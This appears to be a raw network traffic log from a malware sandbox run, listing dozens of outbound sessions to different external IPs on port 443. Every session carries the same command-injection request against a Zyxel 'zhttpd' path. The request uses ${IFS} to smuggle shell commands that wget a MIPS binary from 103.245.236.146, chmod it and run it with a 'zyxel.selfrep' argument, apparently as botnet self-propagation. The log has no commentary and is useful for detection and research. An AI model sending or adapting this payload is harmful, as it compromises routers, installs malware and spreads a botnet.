                                      Jan 19, 2024 17:29:17.467485905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      787192.168.2.145282254.24.253.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467533112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      788192.168.2.1451510160.229.145.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467578888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      789192.168.2.144822681.228.200.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467601061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      790192.168.2.145080868.168.214.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467650890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      791192.168.2.1449434165.67.244.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467696905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      792192.168.2.1448308182.35.207.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467720032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      793192.168.2.143538694.165.112.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467767954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      794192.168.2.1454938147.122.43.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.467825890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      795192.168.2.1441702121.95.56.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.470287085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      796192.168.2.1442068131.0.6.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.470983028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      797192.168.2.1448276122.247.23.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.470999002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      798192.168.2.144571213.30.26.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471051931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      799192.168.2.1440188175.170.95.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471080065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      800192.168.2.1454702156.193.180.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471124887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      801192.168.2.1444816114.46.191.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471138954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      802192.168.2.145011458.229.232.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471187115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      803192.168.2.1447248180.160.130.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471229076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      804192.168.2.143650245.203.168.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471261024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      805192.168.2.1440644101.126.44.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471295118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      806192.168.2.1441678141.83.29.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471326113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      807192.168.2.1459842142.4.52.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471349955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      808192.168.2.1441592158.12.144.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471378088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      809192.168.2.144894650.102.14.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471419096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      810192.168.2.1459868157.62.229.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471448898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      811192.168.2.143454879.62.235.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471473932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      812192.168.2.1434602206.82.121.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471503973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      813192.168.2.1437156151.85.8.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471548080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      814192.168.2.1443214223.234.182.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471577883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      815192.168.2.1460172109.187.146.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.471622944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      816192.168.2.1454552164.92.167.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465465069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      817192.168.2.1446890101.229.84.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465496063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      818192.168.2.1443696200.6.39.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465564966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      819192.168.2.1437284107.133.232.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465590954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      820192.168.2.143348893.248.206.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465622902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      821192.168.2.1435594191.137.128.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465676069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      822192.168.2.1460160169.221.45.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465722084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      823192.168.2.1448550104.102.101.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465795040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      824192.168.2.1449124206.163.232.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465795040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      825192.168.2.1439966100.234.214.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465811968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      826192.168.2.1450184120.130.226.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465859890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      827192.168.2.144765014.144.67.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465898991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      828192.168.2.1447176182.103.178.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465965033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      829192.168.2.1452620149.78.179.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:18.465986967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      830192.168.2.1452630140.128.158.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502633095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      831192.168.2.143872047.125.238.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502700090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      832192.168.2.1451400160.22.208.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502708912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      833192.168.2.1457444216.199.226.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502741098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      834192.168.2.143375638.118.218.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502753973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      835192.168.2.1444534212.105.150.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502806902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      836192.168.2.1454582197.236.78.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502856970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      837192.168.2.143292650.162.61.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502902985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      838192.168.2.1454798122.232.7.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502954960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      839192.168.2.14437448.167.255.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.502991915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      840192.168.2.145031474.38.249.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503025055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      841192.168.2.1459696157.76.210.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503055096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      842192.168.2.14393582.69.147.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503113985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      843192.168.2.1437948145.241.162.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503140926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      844192.168.2.1451324123.252.125.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503181934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      845192.168.2.1447902102.92.245.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503226995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      846192.168.2.1449348157.5.80.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503257990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      847192.168.2.144078673.7.224.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503304958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      848192.168.2.1435398129.33.87.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503329992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      849192.168.2.1456534207.230.174.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503370047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      850192.168.2.1440322177.184.82.65443
                                      TimestampBytes transferredDirectionData
